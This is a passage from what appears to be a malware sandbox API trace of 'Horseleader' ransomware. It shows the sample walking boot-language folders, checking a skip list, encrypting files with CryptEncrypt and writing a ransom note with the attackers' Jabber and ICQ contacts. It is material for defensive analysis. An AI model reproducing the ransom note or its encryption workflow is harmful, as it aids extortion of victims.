dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.817] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.818] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\#Decrypt#.txt") returned 31 [0121.818] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\#Decrypt#.txt" (normalized: "c:\\boot\\fr-fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.818] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.818] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.820] lstrlenA (lpString="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") returned 1368 [0121.820] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.820] CloseHandle (hObject=0x200) returned 1 [0121.821] GetProcessHeap () returned 0x780000 [0121.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.821] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0121.821] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0121.821] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0121.821] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0121.821] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0121.821] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hu-HU", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.821] GetProcessHeap () returned 0x780000 [0121.821] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.822] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0121.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.822] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0121.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.823] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.823] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.823] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0121.823] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.823] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0121.823] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.823] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.823] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0121.823] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.824] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.824] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.824] lstrlenW (lpString=".testttjffg") returned 11 [0121.824] StrStrW (lpFirst="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.824] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.824] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.824] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.825] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.825] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.825] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\#Decrypt#.txt") returned 31 [0121.825] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\#Decrypt#.txt" (normalized: "c:\\boot\\hu-hu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.826] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.826] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.827] lstrlenA (lpString="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") returned 1368 [0121.827] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.827] CloseHandle (hObject=0x200) returned 1 [0121.828] GetProcessHeap () returned 0x780000 [0121.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.828] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="it-IT", cAlternateFileName="")) returned 1 [0121.828] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0121.828] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0121.828] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0121.828] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0121.829] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.829] GetProcessHeap () returned 0x780000 [0121.829] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.829] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0121.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.870] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.870] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0121.870] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.871] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.871] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.871] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0121.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.871] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.871] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.871] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0121.872] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.872] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.872] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.872] lstrlenW (lpString=".testttjffg") returned 11 [0121.872] StrStrW (lpFirst="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.872] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.873] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.873] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.873] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\#Decrypt#.txt") returned 31 [0121.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\#Decrypt#.txt" (normalized: "c:\\boot\\it-it\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0121.874] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.874] WriteFile (in: hFile=0x150, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.876] lstrlenA (lpString="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") returned 1368 [0121.876] WriteFile (in: hFile=0x150, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.876] CloseHandle (hObject=0x150) returned 1 [0121.876] GetProcessHeap () returned 0x780000 [0121.877] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.877] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0121.877] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0121.877] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0121.877] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0121.877] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0121.877] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ja-JP", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.878] GetProcessHeap () returned 0x780000 [0121.878] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.878] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0121.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.879] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.879] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0121.879] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.879] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.879] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0121.879] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0121.880] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.880] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.880] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0121.880] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.880] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.880] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.880] lstrlenW (lpString=".testttjffg") returned 11 [0121.881] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.881] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.881] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.881] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.882] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.882] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\#Decrypt#.txt") returned 31 [0121.882] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\#Decrypt#.txt" (normalized: "c:\\boot\\ja-jp\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0121.882] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
